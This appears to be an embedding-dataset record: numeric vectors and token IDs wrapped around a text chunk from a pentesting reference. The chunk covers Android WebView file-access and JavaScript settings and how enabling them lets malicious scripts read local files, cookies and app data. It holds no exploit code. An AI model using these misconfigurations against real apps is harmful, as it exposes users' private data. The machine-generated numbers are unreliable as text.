-0.3263974189758301, -0.5945536494255066, -0.04920589551329613, 0.7793447375297546, -0.2570892572402954, 0.11572466045618057, 0.43262627720832825, 0.3356213867664337, 0.000826891278848052, -0.2932610809803009, 0.1253790259361267, -0.18076995015144348, 0.3182263970375061, -0.030725685879588127, 0.2525475323200226, -0.11498332768678665, 0.21621859073638916, 0.40390250086784363, -0.6164774894714355, -0.022175515070557594, -0.7852023839950562, -0.2787701189517975, -0.386989563703537, 0.5823974013328552, 0.17068149149417877, 0.9716605544090271, -0.4290332496166229, 0.2698131203651428, -0.700817883014679, 0.7390820384025574, 0.577111005783081, 0.3726479113101959, 0.2332000881433487, 0.45820820331573486, 0.4351707696914673, -0.05071000009775162, -0.2951410710811615, -0.1205044612288475, -0.49275505542755127, -0.2226453572511673, -0.33619800209999084, -0.07232097536325455, 0.04508117586374283, 0.04103123024106026, 0.7829121947288513, 0.3153438866138458, 0.7799047231674194, 0.6142404079437256, -0.13582581281661987, -0.10318450629711151, -0.9315309524536133, -0.3130454421043396, -1.0990917682647705, -0.3645331859588623, 0.43112942576408386, -0.1385737657546997, -0.7475899457931519, -0.36332887411117554, 0.05738220363855362, 0.22222812473773956, 0.2048262059688568, -0.5829883217811584, 0.4539830684661865, 0.2638566792011261, -0.16856566071510315, 0.9332363605499268, -0.6727343797683716, 0.0317368283867836, -0.248673677444458, 0.5228161215782166, -0.5514954924583435, -0.7973081469535828, 0.3216487467288971, 0.730627715587616, 0.1413755863904953, -0.4040234386920929, -0.5219418406486511, -0.1253327578306198, 0.373332142829895, 0.07230881601572037, 0.3366720676422119, 0.46600690484046936, -0.49284619092941284, 0.8891197443008423, -0.6815987825393677, -0.40394625067710876, 0.1281198114156723, 0.17241834104061127, 0.5043485760688782, 0.05000495910644531, -0.09079408645629883, 0.13206131756305695, -0.16549643874168396, 0.1642565280199051, 0.7278172969818115, 0.28283581137657166, 0.7720230221748352, -0.8224278092384338, -0.10791483521461487, -0.4837757349014282, 0.2887650430202484, 0.7923646569252014, -0.5338050127029419, -0.41864073276519775, 0.42654654383659363, 0.519649863243103, -0.5297157168388367, -0.04630913585424423, 0.43155792355537415, -0.5345494747161865, -0.04813315346837044, 0.3829454183578491, -0.10668513178825378, -0.6499024033546448, 0.06469015777111053, -0.4623614251613617, -0.23332256078720093, -0.6755553483963013, 0.16683132946491241, 0.2426355481147766, -0.6412883400917053, 0.8388172388076782, -0.32946598529815674, 0.9268607497215271, 0.20460857450962067, 0.246735081076622, 0.7191384434700012, -0.16152897477149963, -0.58528071641922, 0.5109376907348633, 0.7751073241233826, 0.3151111304759979, -0.03138492628931999, 0.4312605559825897, -0.34885063767433167, 0.41787880659103394, 0.585466742515564, -0.22196629643440247, -0.8208118677139282, 0.1697625070810318, 0.31669068336486816, -0.5189469456672668, -0.7440216541290283, 0.057140275835990906, 0.07443666458129883, 0.023227425292134285, 0.5682904124259949, -0.4154958724975586, -0.1800040602684021, -0.13337235152721405, 0.027082858607172966, -0.44634994864463806, -0.03536849468946457, 0.5929878950119019, -0.22982561588287354, -0.6600310802459717, 0.4801572561264038, -0.13286423683166504, 0.31059810519218445, -0.4713646471500397, 0.5132039189338684, 0.29177865386009216, 0.44873324036598206, -0.3087102472782135, -0.026433376595377922, -0.5634796023368835, 0.35848841071128845, -0.655478835105896, 0.005840436089783907, 0.015598936006426811, -0.8316831588745117, 0.28756198287010193, -0.007761533372104168, -0.6810997128486633, -0.5863332748413086, 0.08562740683555603, 0.03747186064720154, -0.8021276593208313, 0.7741866707801819, -0.009160015732049942, -0.16874299943447113, -0.060844361782073975, 0.10740518569946289, -0.5266562700271606, 0.31459948420524597, -0.6151185035705566, -0.12443819642066956, -0.24968641996383667, 0.17459248006343842, -0.050359733402729034, -0.15965721011161804, -0.7952693104743958, 0.2422110140323639, 0.23188607394695282, -0.4586644172668457, -0.8679574131965637, 0.5758987665176392, 0.15626204013824463, -0.30020180344581604, 1.0164217948913574, 0.2172587811946869, 0.10910338163375854, 0.81218022108078, -0.6722633838653564, -0.09821732342243195, 0.40343374013900757, 0.5942366719245911, -0.38372576236724854, 0.9421406984329224, 0.10641568899154663, 0.06004694476723671, 0.08756125718355179, -0.36964479088783264, 0.8848168253898621, 0.13861121237277985, -0.8901879191398621, -0.6879037022590637, -0.42532652616500854, -0.2988717555999756, 0.11686991900205612, 0.3261314630508423, -0.1062963604927063, -1.0966006517410278, -0.4144265055656433, -0.90728360414505, 0.1609792858362198, -0.08374345302581787, 0.3214970827102661, 0.37143558263778687, -0.13054892420768738, 0.4010671377182007, -0.36551955342292786, 0.37249526381492615, -1.3089414834976196, 4.380964279174805, 0.08313193172216415, -0.17072032392024994, -0.26325416564941406, 0.1671922206878662, 0.4295704662799835, 1.0901991128921509, -1.1032958030700684, -0.6526100635528564, -0.22906580567359924, 0.6352391242980957, -0.36400213837623596, 0.49463480710983276, 0.07444016635417938, -0.035612188279628754, 0.5558173656463623, -0.2722518742084503, 0.38830286264419556, 0.4210442006587982, -1.1915841102600098, -0.997394859790802, -0.26461559534072876, -0.7798326015472412, 0.34210866689682007, 0.5271257162094116, 0.2666817605495453, 0.09247825294733047, -0.9655849933624268, -0.49156442284584045, -0.7137898206710815, -0.23635965585708618, -0.8361579179763794, 0.35283157229423523, -0.15727116167545319, -1.2186661958694458, 0.3564668893814087, 0.11394887417554855, -0.7264346480369568, -0.18578024208545685, -0.013849618844687939, -0.138173446059227, -0.3666173815727234, 0.009697568602859974, -0.4977879822254181, 0.33583971858024597, 0.9964298009872437, -0.14252465963363647, -0.03686949610710144, 0.6875386238098145, -0.40464749932289124, 0.8405380249023438, 0.14963212609291077, 0.3509313464164734, -0.5262599587440491, -0.3733258843421936, -0.24905313551425934, 0.14875246584415436, -0.017719576135277748, 0.1486975997686386, 0.21040894091129303, 0.6447898149490356, -0.4842185974121094, 0.073943592607975, -0.2787129580974579, -1.0543732643127441, 0.3224135935306549, -0.1198054775595665, 0.7643902897834778, 0.5715985894203186, 0.19563226401805878, -0.29640480875968933, -0.42729347944259644, -0.24852946400642395, -0.21523824334144592, 0.1894124448299408, 0.3713752329349518, 0.3255389630794525, 0.6267593502998352, 1.0615208148956299, -0.24817080795764923, -0.13413433730602264, -0.5449770092964172, -0.4784151613712311, 0.7732704877853394, 1.1767343282699585, 0.9211083650588989, -0.5703580975532532, -0.9120985269546509, -0.19125033915042877, 0.5873722434043884, 0.39913830161094666, 0.4143321216106415, -0.4721241593360901, 0.08883342891931534, 0.16607551276683807 ]
[ 101, 4773, 8584, 4491, 18447, 18702, 3436, 22354, 29337, 2064, 6709, 2019, 6086, 4773, 8584, 2066, 2023, 1024, 5371, 3229, 8545, 2497, 8584, 5371, 3229, 2003, 9124, 2011, 12398, 1012, 2144, 17928, 1017, 1006, 2452, 17955, 1015, 1012, 1019, 1007, 1996, 4118, 2275, 8095, 5004, 8873, 19738, 9468, 7971, 1006, 1007, 2003, 2800, 2005, 12045, 12067, 2030, 4487, 3736, 9709, 2009, 1012, 2065, 1996, 4646, 2038, 1035, 11924, 1012, 6656, 1012, 3191, 1035, 6327, 1035, 5527, 1035, 2009, 2097, 2022, 2583, 2000, 3191, 1998, 7170, 6764, 2013, 1996, 6327, 5527, 1012, 1996, 4773, 8584, 3791, 2000, 2224, 1037, 5371, 24471, 2140, 5679, 1010, 1041, 1012, 1043, 1012, 1010, 5371, 1024, 1013, 1013, 4130, 1013, 5371, 1010, 2000, 3229, 1996, 5371, 1012, 5415, 3229, 2013, 5371, 24471, 2140, 1006, 2139, 28139, 12921, 1007, 4520, 3251, 2892, 1011, 4761, 11186, 1999, 1996, 6123, 1997, 1037, 5371, 5679, 24471, 2140, 2323, 2022, 3039, 2000, 3229, 4180, 2013, 2151, 4761, 1012, 2023, 2950, 3229, 2000, 4180, 2013, 2060, 5371, 5679, 24471, 4877, 2030, 4773, 18046, 1012, 3602, 2008, 2070, 3229, 2107, 2004, 3746, 16129, 3787, 2987, 1005, 1056, 3582, 2168, 1011, 4761, 3513, 1998, 3475, 1005, 1056, 5360, 2011, 2023, 4292, 1012, 2123, 1005, 1056, 9585, 2023, 4292, 2065, 2017, 2330, 6764, 2008, 2089, 2022, 2580, 2030, 8776, 2011, 6327, 4216, 1012, 12067, 2023, 4292, 4473, 24391, 14546, 8209, 1999, 1037, 5371, 1024, 1013, 1013, 6123, 2000, 4888, 2892, 1011, 2609, 5896, 2075, 4491, 1010, 2593, 3229, 2075, 15275, 2334, 6764, 2164, 4773, 8584, 16324, 1010, 10439, 2797, 2951, 2030, 2130, 22496, 2109, 2006, 15275, 4773, 4573, 1012, 1999, 12654, 2023, 2097, 4652, 10578, 15275, 7321, 1012, 1996, 10439, 2097, 4604, 1996, 24471, 2140, 5227, 8840, 7170, 1996, 4180, 2007, 4761, 1024, 5371, 1024, 1013, 1013, 2065, 1996, 3433, 2987, 1005, 1056, 3499, 2008, 4761, 1006, 3229, 1011, 2491, 1011, 3499, 1011, 4761, 1024, 5371, 1024, 1013, 1013, 1007, 2059, 1996, 4180, 2180, 1005, 1056, 2022, 8209, 1012, 1996, 12398, 3643, 2003, 6270, 2043, 14126, 3857, 1012, 2544, 1035, 9537, 1012, 20919, 1035, 14068, 1998, 2682, 1012, 2224, 2131, 8095, 5004, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 1007, 2000, 2113, 3251, 9262, 22483, 2770, 1999, 1996, 6123, 1997, 1037, 5371, 5679, 24471, 2140, 2064, 3229, 4180, 2013, 2151, 4761, 1006, 2065, 5415, 6305, 9623, 22747, 21716, 8873, 2571, 3126, 2140, 2003, 9124, 1007, 1012, 2224, 2275, 8095, 5004, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 22017, 20898, 1007, 2000, 9585, 1013, 4487, 19150, 2009, 1012, 2478, 7170, 2850, 2696, 24415, 15058, 3126, 2140, 1006, 1007, 2007, 19701, 2004, 2918, 3126, 2140, 2097, 2036, 4652, 2000, 7170, 2334, 6764, 2130, 2065, 2035, 1996, 4795, 10906, 2024, 9124, 1012, 5371, 3229, 2013, 5371, 24471, 4877, 1006, 2139, 28139, 12921, 1007, 4520, 3251, 2892, 1011, 4761, 11186, 1999, 1996, 6123, 1997, 1037, 5371, 5679, 24471, 2140, 2323, 2022, 3039, 2000, 3229, 4180, 2013, 2060, 5371, 5679, 24471, 4877, 1012, 3602, 2008, 2070, 3229, 2229, 2107, 2004, 3746, 16129, 3787, 2123, 1005, 1056, 3582, 2168, 1011, 4761, 3513, 1998 ]
hack_tricks
427.txt
0
aren't affected by this setting. don't enable this setting if you open files that may be created or altered by external sources. enabling this setting allows malicious scripts loaded in a file : / / context to access arbitrary local files including webview cookies and app private data. in summary, this prevents javascript to access local files via file : / / protocol. note that the value of this setting is ignored if the value of getallowuniversalaccessfromfileurls ( ) is true. the default value is false when targeting build. version _ codes. jelly _ bean and above. use getallowfileaccessfromfileurls ( ) to know whether javascript is running in the context of a file scheme url can access content from other file scheme urls. use setallowfileaccessfromfileurls ( boolen ) to enable / disable it. file accessenables or disables file access within webview. note that this enables or disables file system access only. assets and resources are still accessible using file : / / / android _ asset and file : / / / android _ res. in summary, if disable, the webview won't be able to load a local file with the file : / / protocol. the default value isfalse when targeting build. version _ codes. r and above. use getallowfileaccess ( ) to know if the configuration is enabled. use setallowfileaccess ( boolean ) to enable / disable it. webviewassetloaderhelper class to load local files including application's static assets and resources using url urls inside a webview class. loading local files using web - like urls instead of " file : / / " is desirable as it is compatible with the same - origin policy. this is new recommended way to load local files. the goal is to access local files using a http url with the domain. this way the cors can be easily maintained between the local web pages and the web pages that are downloaded from the web server. javascript enabledwebviews have javascript disabled by default. the method setjavascriptenabled ( ) is can explicitly enabling or disabling it. note that webviews can also support the intent scheme that allows to fire other applications. read this writeup to find how to go from xss to rce. here is
[ 0.34274378418922424, 0.07788283377885818, 0.1861872375011444, 0.08695375919342041, -0.4650261104106903, 0.32587480545043945, -0.0001393426355207339, -0.14557653665542603, 0.7293282747268677, 1.014960527420044, 0.03622664138674736, 0.080989308655262, 0.5877033472061157, -0.5746139287948608, -0.2888962924480438, -0.2940727472305298, -0.3775867819786072, -0.12256669998168945, -0.4019032120704651, -0.21033655107021332, -0.011257762089371681, 0.4435011148452759, -0.5581827163696289, -1.304248571395874, -0.31711307168006897, 0.7927185893058777, 0.6420087218284607, 0.015450986102223396, 0.5071530938148499, 1.1542372703552246, 0.17747050523757935, -0.13156171143054962, -0.25883087515830994, -0.3511924147605896, -0.0021919889841228724, -0.2185012698173523, 1.0097206830978394, 0.1405387967824936, 0.26733505725860596, -1.1842490434646606, 0.21617722511291504, -0.3943702280521393, -0.16900083422660828, -0.5801560282707214, -0.26856398582458496, -0.8121465444564819, 0.4769079387187958, -0.0108822425827384, 0.21129414439201355, 0.10107072442770004, -0.030512668192386627, 0.12080442160367966, 0.016258936375379562, -0.04727601259946823, 0.2955304682254791, -0.1623028963804245, 0.03185645118355751, -0.3335425555706024, -0.4559573233127594, 0.7026611566543579, 0.02590823918581009, 0.3226921856403351, 0.1471487432718277, -0.18352024257183075, -0.019088568165898323, 0.6805060505867004, 0.12207190692424774, -0.0032757946755737066, 0.07209444046020508, -0.51325523853302, -0.5392138957977295, 0.8509438037872314, -0.814129650592804, -0.33511731028556824, -0.8603401184082031, -0.04314834251999855, -0.1311759054660797, 0.2995492219924927, 0.09463506937026978, 0.12254606932401657, -0.2785566747188568, 0.8627883791923523, 0.4013901352882385, -0.4358213245868683, -0.7263553738594055, -0.40820401906967163, 0.3830910921096802, 0.45430421829223633, -0.3812726140022278, 0.5680093765258789, -0.1386082023382187, 0.7748619318008423, -0.8353493213653564, -0.3567691743373871, 0.6099379658699036, 1.043467402458191, -0.1504143476486206, -0.05169674754142761, -0.14958545565605164, -0.4142047166824341, 0.3060520887374878, 1.4609097242355347, 0.29865720868110657, -0.0694844126701355, -0.3780711591243744, 0.2116868644952774, 0.22581204771995544, -0.36172130703926086, -0.4716542363166809, -0.4851728677749634, 0.15741901099681854, -0.20623140037059784, 0.35804104804992676, -0.7052575349807739, 0.39073678851127625, 0.3326754570007324, 0.2955532371997833, 0.2425229698419571, -0.235846146941185, 0.28064683079719543, 0.27706974744796753, -0.2989916503429413, 0.037549905478954315, -0.4789150655269623, 0.2086472511291504, 0.8186027407646179, 0.24749043583869934, 0.71396404504776, -0.33213338255882263, -0.25834348797798157, 0.20405150949954987, -0.18616275489330292, 0.21977059543132782, 0.6737624406814575, -0.49647969007492065, 0.21180295944213867, 0.10634889453649521, 0.27734947204589844, 0.35431429743766785, -0.7651699185371399, 0.239055335521698, 1.020983338356018, 0.3423375189304352, 1.0687812566757202, 0.5167419910430908, 0.30636125802993774, -0.3940914273262024, -0.2561928629875183, -0.996504008769989, 0.5404743552207947, -0.23815159499645233, 0.38405841588974, 0.604390561580658, 0.09877348691225052, -1.01960027217865, 0.3244159519672394, -0.9843833446502686, 0.3994816541671753, 0.0450471006333828, 0.029900934547185898, -0.2914640009403229, 0.8703609108924866, -0.27189117670059204, 0.32369762659072876, -0.8175205588340759, 0.6081147789955139, -0.9314122200012207, -0.809150218963623, 0.01586979068815708, 0.25729498267173767, 0.19334670901298523, 0.5886820554733276, -0.08519342541694641, 0.3438347578048706, 1.6542267799377441, 0.45565474033355713, -0.5410165786743164, -0.21800658106803894, -0.25226014852523804, 0.3815547227859497, -0.1956321746110916, 0.522034764289856, 0.4461638629436493, 0.825039267539978, -0.5888901352882385, 0.5436784029006958, -0.37424543499946594, -0.3802306056022644, -0.07376629114151001, -0.30530714988708496, -0.3883799612522125, 0.5266706943511963, -0.6065078377723694, 0.44883018732070923, 0.5941535830497742, 0.12507247924804688, -1.6779519319534302, -0.14778968691825867, -0.6059069037437439, -1.6053905487060547, -0.6857796311378479, 0.11402856558561325, -0.06278740614652634, 0.5600644946098328, -0.45204001665115356, -0.5606459975242615, 1.2068254947662354, 0.8281715512275696, -0.09014298766851425, 0.710421621799469, 0.9396755695343018, -0.11640659719705582, -0.8771457076072693, -0.12808829545974731, 0.4870062470436096, -0.3356330394744873, -0.36488279700279236, -0.07151277363300323, 0.2618553638458252, 0.18994267284870148, -0.4326946437358856, 0.42198342084884644, 0.3623303174972534, 0.6152706146240234, 0.1463950127363205, -0.08832831680774689, -0.015680117532610893, 0.07524321228265762, 0.26027408242225647, 0.21148884296417236, -0.25667423009872437, 0.72783362865448, 0.22208823263645172, 0.5261160731315613, -0.052808985114097595, 0.5013262033462524, 0.04850214719772339, 0.3904508352279663, 0.2214708775281906, 0.26179933547973633, -0.277275949716568, 1.4612436294555664, 0.2300121933221817, 0.7039297223091125, 0.13511425256729126, 0.597200334072113, -0.3266605734825134, 0.4225667417049408, -0.1864035576581955, 0.3894064724445343, -0.3247215747833252, 0.5725909471511841, 0.7133646607398987, -0.2813209593296051, -0.7463533878326416, -0.4451558589935303, 0.6460942029953003, 0.6169888973236084, 0.011942090466618538, -1.0301965475082397, -0.14864259958267212, 0.2416471242904663, -0.31529751420021057, -0.31625619530677795, 0.3676464259624481, 0.5500672459602356, 0.04226035624742508, 0.19786536693572998, -0.23854361474514008, -0.6415885090827942, -0.624609112739563, 0.5450420379638672, -1.3057780265808105, -0.19197145104408264, -1.246465802192688, -0.21633969247341156, 0.34732112288475037, -0.5842670202255249, 0.627899706363678, -0.4493979215621948, -0.47519993782043457, -0.367977112531662, -0.1571688950061798, 0.4384163022041321, 0.19231559336185455, 0.13436158001422882, -0.8446080088615417, -0.13657987117767334, 0.04367243871092796, 0.4663759768009186, -0.645450234413147, -0.2030424028635025, -0.9267253279685974, -0.03255825489759445, 0.1572103649377823, -0.1277035027742386, 1.0036988258361816, 0.05172263830900192, -0.13107682764530182, -0.5016288161277771, 0.37913307547569275, -0.005264942534267902, -0.016791900619864464, 0.15071845054626465, -0.3583643436431885, 0.24301040172576904, -0.016620339825749397, 0.029018746688961983, 0.524684488773346, 0.9973921179771423, -0.5318593978881836, 0.23395498096942902, 0.0741078183054924, 1.3037511110305786, -0.5627514123916626, 0.571289598941803, 0.01136853825300932, 0.22364890575408936, -0.2574920952320099, -0.3092162311077118, 0.5377249121665955, -0.35872307419776917, -0.19392435252666473, -0.17294909060001373, -0.18018677830696106, 0.7669664621353149, -0.27527016401290894, -0.7479280829429626, 0.45030301809310913, -0.5970005393028259, -0.5204864740371704, -0.9953876733779907, -0.3376964330673218, 0.743284285068512, 0.12130450457334518, 0.3562462627887726, 0.02944398671388626, -0.5945060849189758, -0.10475336015224457, 0.00810889434069395, -0.12457974255084991, -0.6250584125518799, 0.6585068106651306, 0.03713056817650795, -0.404681533575058, 0.5396363139152527, 0.3539721965789795, -0.11795122921466827, 0.3435763418674469, -0.3567979335784912, -0.1252051591873169, -0.22144721448421478, -0.01660405658185482, 0.17631202936172485, 0.09779653698205948, 0.5892866253852844, -0.49541381001472473, 0.6750906705856323, 0.18666374683380127, 0.18956011533737183, 0.9601221084594727, 0.528058648109436, 0.44003984332084656, -0.12252815812826157, 0.036092404276132584, -0.9047613143920898, 0.1856595277786255, -0.1302616447210312, 0.3998919725418091, -0.2807924747467041, 0.9159132838249207, -0.4979037046432495, -0.33381888270378113, 0.8704001903533936, -0.20324836671352386, -0.3373268246650696, 0.5582367181777954, -0.29866018891334534, 0.6750518679618835, -0.5540138483047485, -0.037387993186712265, -0.4600294530391693, 0.09980043023824692, 0.96500563621521, -0.11199591308832169, 0.15600590407848358, -0.09648269414901733, -0.504186749458313, 0.063106968998909, -0.4766274392604828, -0.1250438243150711, -0.2086276113986969, 0.45138537883758545, -0.43141284584999084, -0.8673659563064575, -1.1050772666931152, 0.0816928893327713, 0.9079739451408386, 0.3893910348415375, 0.21667121350765228, -0.12121672928333282, 0.3503722548484802, -0.17307144403457642, 0.286763459444046, -0.3010784685611725, 0.34863656759262085, -0.521391749382019, 0.8554520606994629, 0.164303719997406, 0.1706322282552719, -0.20959007740020752, -0.14944049715995789, -0.7924429178237915, -0.08520878106355667, 0.350567102432251, 0.2855789363384247, -0.5711809992790222, -0.8577072620391846, 0.6617109775543213, -0.11517567932605743, -0.49076762795448303, -0.5906935334205627, -0.4341332018375397, 0.4028419852256775, 0.8190252780914307, -0.44452834129333496, -0.45861104130744934, -0.5898820161819458, 0.3454105257987976, 0.36266228556632996, -0.23032069206237793, -0.249458909034729, -0.8350452780723572, -0.44601890444755554, -0.5188849568367004, 0.32828956842422485, 0.4848405122756958, 0.4108366072177887, 0.19888578355312347, -1.1334518194198608, 0.052309878170490265, 0.49751245975494385, -0.04187668114900589, -0.5070719718933105, -0.19571079313755035, 0.39636263251304626, 0.7677589654922485, 0.2760724127292633, -1.0723942518234253, -0.30163854360580444, 0.14523817598819733, -0.9917614459991455, 0.9146230220794678, -0.6172418594360352, -0.08871372044086456, -0.09129971265792847, 0.12197742611169815, -0.4577760100364685, 0.36562010645866394, -0.8798743486404419, -0.033232029527425766, -0.5331214070320129, -0.6405620574951172, -0.14189553260803223, -0.22159728407859802, 0.7072051763534546, -0.015701472759246826, -0.08098669350147247, 0.3398483991622925, 0.46488437056541443, 0.15962424874305725, 0.055489227175712585, -0.23559202253818512, -0.8481606245040894, 0.3721127510070801, -1.056906819343567, 0.1785701960325241, 0.03876779228448868, 0.1167333722114563, 0.09774690121412277, -0.6151573061943054, 0.81065434217453, -0.4325586259365082, -0.0080827372148633, -0.6499754190444946, -0.4955659508705139, -0.08294736593961716, -0.04330325126647949, -0.09293460100889206, 0.7408219575881958, -0.014511968940496445, -0.07872506976127625, -0.25518468022346497, -0.25155752897262573, -0.4759660065174103, -0.8565608263015747, -0.3020663857460022, 0.10764304548501968, -0.011597148142755032, -0.3004559874534607, 0.5841973423957825, -0.6899847388267517, -0.554003119468689, 0.21192435920238495, 0.15931451320648193, 0.007405866868793964, -1.0237973928451538, -0.3869118094444275, -0.7755581140518188, 0.10669940710067749, 0.3669339716434479, 0.28729328513145447, -0.06740239262580872, 0.19733764231204987, -0.3607785701751709, 0.28583067655563354, 0.46909409761428833, -0.26008158922195435, -0.0008815571782179177, 0.7380433678627014, -0.08377070724964142, -0.4104444682598114, 0.26472896337509155, 0.3433709144592285, -0.40904319286346436, 0.15610893070697784, -0.0030938179697841406, -0.28455036878585815, -0.9644442200660706, -0.49567505717277527, -0.3187175691127777, -0.29859545826911926, 0.28279927372932434, -0.03079419769346714, -0.19991175830364227, -0.40949708223342896, 1.014998435974121, -0.13199450075626373, -0.8012499213218689, 0.3929634988307953, 0.37585118412971497, 0.04443500563502312, -0.5433204174041748, -0.5574501752853394, -0.9028767943382263, -0.33868199586868286, 0.40987324714660645, 0.25093507766723633, 0.09681383520364761, 0.07172778993844986, -0.10002987086772919, 0.24900895357131958, 0.3497905433177948, 0.10523702204227448, -0.8662720322608948, -0.2556377351284027, -0.3974492847919464, 0.0027843103744089603, -0.6503727436065674, 0.288761168718338, -1.0233945846557617, 0.2484995573759079, -0.03018908202648163, 0.3717368543148041, 0.15422376990318298, -0.021877922117710114, 0.07857263833284378, 0.31768515706062317, 0.5310576558113098, -0.6012322902679443, -0.014569899067282677, -0.3965451717376709, 0.849364697933197, -0.004189574625343084, -0.7919172048568726, -0.6435219049453735, 0.17569980025291443, -0.4924924671649933, -1.07594633102417, 0.8795187473297119, -0.32863280177116394, -0.17202074825763702, -0.1482873260974884, -0.40788865089416504, 0.3129386603832245, -0.06422100216150284, 0.4825626015663147, 0.8658820986747742, -0.02428273670375347, -0.07204888015985489, -0.6978940367698669, 0.42795413732528687, -0.014453413896262646, -0.30456048250198364, 0.1429833322763443, -0.16267676651477814, -0.595866858959198, 0.2311142086982727, -0.15127325057983398, -0.2554769217967987, -0.9657506346702576, -0.23818771541118622, 0.18969206511974335, -0.32260507345199585, 0.6155328154563904, 0.10705767571926117, -1.1206328868865967, -0.24660375714302063, 0.06503917276859283, 0.05794534459710121, -0.5150440335273743, 0.7066366076469421, 0.29491907358169556, 0.16642330586910248, 0.291080504655838, -0.38733646273612976, -0.4382999837398529, 0.11852932721376419, 0.544812798500061, -0.21181118488311768, -0.408816397190094, 0.43412256240844727, -0.08866671472787857, -0.8045228719711304, -0.31791073083877563, -0.466193288564682, -0.0767253190279007, 0.2580161690711975, -0.31080228090286255, 0.05580827221274376, 0.2849276661872864, 0.05764955282211304, -0.3693097233772278, 0.6399833559989929, 0.056875698268413544, 0.3897497355937958, -0.2107468694448471, -0.1107737347483635, 0.29983407258987427, -0.23263698816299438, 0.3324985206127167, -0.6990876197814941, -0.14653414487838745, -0.6189764738082886, 0.4553872048854828, 0.3502731919288635, 0.07859905809164047, 1.0238924026489258, -0.5289847254753113, 0.5954737663269043, -0.1661548912525177, 0.4499591886997223, 0.8648203611373901, -0.10227450728416443, 0.2007884681224823, 0.3223709464073181, 0.42929407954216003, -0.5721450448036194, -0.1370018869638443, 0.28094008564949036, 0.16531957685947418, 0.13923533260822296, -0.6935914158821106, -0.08712388575077057, -0.12389246374368668, -0.22877299785614014, 0.1346013993024826, -0.44670793414115906, -0.7862575054168701, -0.5092589259147644, 0.11390886455774307, 0.11059793829917908, -0.34108638763427734, 0.1978316605091095, 0.0375104695558548, -0.3125488758087158, 0.044350530952215195, -0.43775084614753723, 0.22875510156154633, -0.5658910274505615, 0.026964010670781136, -0.516261100769043, 0.08652741461992264, -0.8144869208335876, -0.6081452369689941, -0.6599292159080505, 0.047505706548690796, -0.4029129147529602, -0.9323351383209229, -0.25488191843032837, -0.62380051612854, -0.7061623930931091, 0.1558786779642105, -0.41351282596588135, 0.4125335216522217, 0.26113513112068176, -0.34821006655693054, -0.10066396743059158, 0.656883716583252, -0.3014093041419983, 0.23339983820915222, 0.10411032289266586, 0.4237726330757141, 0.05315199866890907, -0.5345007181167603, -0.09865839034318924, -0.3748977482318878, 0.26292142271995544, -0.3725258708000183, 0.20961213111877441, -0.20564334094524384, -0.0008626978960819542, -0.28280651569366455, -0.7468227744102478, -0.43857309222221375, -0.29502958059310913, -0.05274386703968048, 0.3331384062767029, 0.5267086625099182, 0.08315776288509369, 1.0185366868972778, -0.4292144179344177, -0.15961679816246033, -0.9796231985092163, 0.6670016050338745, 0.6893096566200256, -0.0866597592830658, 0.44959646463394165, 0.14666606485843658, 0.4872240424156189, -0.22738948464393616, 0.03175773099064827, 0.2932129204273224, -0.4476274847984314, 0.12047866731882095, -0.06303970515727997, 0.5783365964889526, 0.2658388614654541, -0.21136575937271118, 0.022383958101272583, 0.5409659743309021, 0.9664382934570312, -0.06456294655799866, -0.15500761568546295, 0.16419188678264618, -0.6976017951965332, 0.5709813237190247, -0.3933524191379547, -0.25512903928756714, 0.15113583207130432, -0.5677528977394104, -0.32176700234413147, -0.7034353017807007, 0.10933484137058258, 0.21666935086250305, 0.5392064452171326, -0.3371388018131256, 0.16843190789222717, 0.5368553400039673, 0.18886178731918335, 0.7724485993385315, -0.42441481351852417, -0.11894535273313522, -0.02207103930413723, 0.46251410245895386, -0.24176974594593048, -0.6612282395362854, 0.19788508117198944, 0.6540573835372925, 0.23994702100753784, -0.19498547911643982, -0.08673437684774399, 0.1993425041437149, 0.3345576226711273, 0.18963304162025452, 0.33326098322868347, 0.0028471334371715784, -0.5111876726150513, 0.6633095145225525, -0.8512436151504517, -0.09808394312858582, -0.15013501048088074, 0.03727869689464569, 0.24189510941505432, 0.15306881070137024, 0.17128723859786987, 0.3257749676704407, 0.23359042406082153, -0.23630189895629883, 0.32554447650909424, 0.48436057567596436, 0.5913732647895813, -0.6347032785415649, 0.5184986591339111, -0.6373010277748108, -0.08787751942873001, 0.8151125311851501, 0.17749205231666565, -0.1647912710905075, 0.6771018505096436, 0.8535700440406799, -0.5217753052711487, -0.2895326316356659, 0.27093908190727234, 0.07472711056470871, -0.5686259269714355, -0.21538713574409485, 0.0006540096364915371, -0.14358343183994293, 0.3058626353740692, -0.24716904759407043, 0.14149725437164307, -0.2084224373102188, 0.08415213972330093, -0.010970650240778923, -0.3450842499732971, 0.8921288847923279, -0.6405092477798462, 0.92351895570755, -0.2888956367969513, 0.028696876019239426, 0.7280523180961609, 0.01404779776930809, -0.45941564440727234, 0.7721725702285767, 1.1007331609725952, 0.7450699210166931, -0.8359428644180298, 0.5842797756195068, -0.2457812875509262, 0.44142618775367737, 0.532080352306366, -0.5185104608535767, -0.1681315153837204, 0.18172487616539001, 0.059033531695604324, -0.6041809320449829, -0.3610849678516388, 0.08538854867219925, 0.3628488779067993, 0.2278616577386856, 0.8926317691802979, -0.5065099596977234, -0.06738929450511932, -0.5915758013725281, 0.28994643688201904, -0.3633273243904114, -0.41122668981552124, 0.6077494025230408, -0.4516931176185608, -0.5490584969520569, 0.5338433980941772, 0.28038349747657776, 0.45907679200172424, -0.528527021408081, 0.8662086725234985, 0.7395483255386353, 0.4188770055770874, -0.025692082941532135, -0.1967131644487381, -0.5703147053718567, -0.010000851936638355, -0.3222123682498932, 0.04417341575026512, 0.1586173176765442, -0.8699312210083008, 0.44352906942367554, 0.02744431048631668, -0.5164888501167297, -0.5545165538787842, 0.10216793417930603, -0.4548196494579315, -0.8629701733589172, 0.934044599533081, 0.14828576147556305, -0.4746737778186798, 0.5361772179603577, 0.4997040331363678, -0.4041655361652374, 0.5491765141487122, -0.6947128772735596, -0.15442657470703125, -0.12094048410654068, -0.2055554986000061, 0.060040827840566635, 0.6433572173118591, -0.6689953804016113, -0.12301807850599289, 0.3692985475063324, -0.5339341163635254, -0.960389256477356, 0.4962470829486847, -0.021248841658234596, -0.9065989255905151, 0.6525081396102905, 0.47267794609069824, -0.07932893931865692, 0.8691371083259583, -1.135104775428772, -0.05608654394745827, -0.217777281999588, 0.758017361164093, -0.010074644349515438, 1.040686011314392, 0.5858378410339355, 0.017589449882507324, 0.46905192732810974, 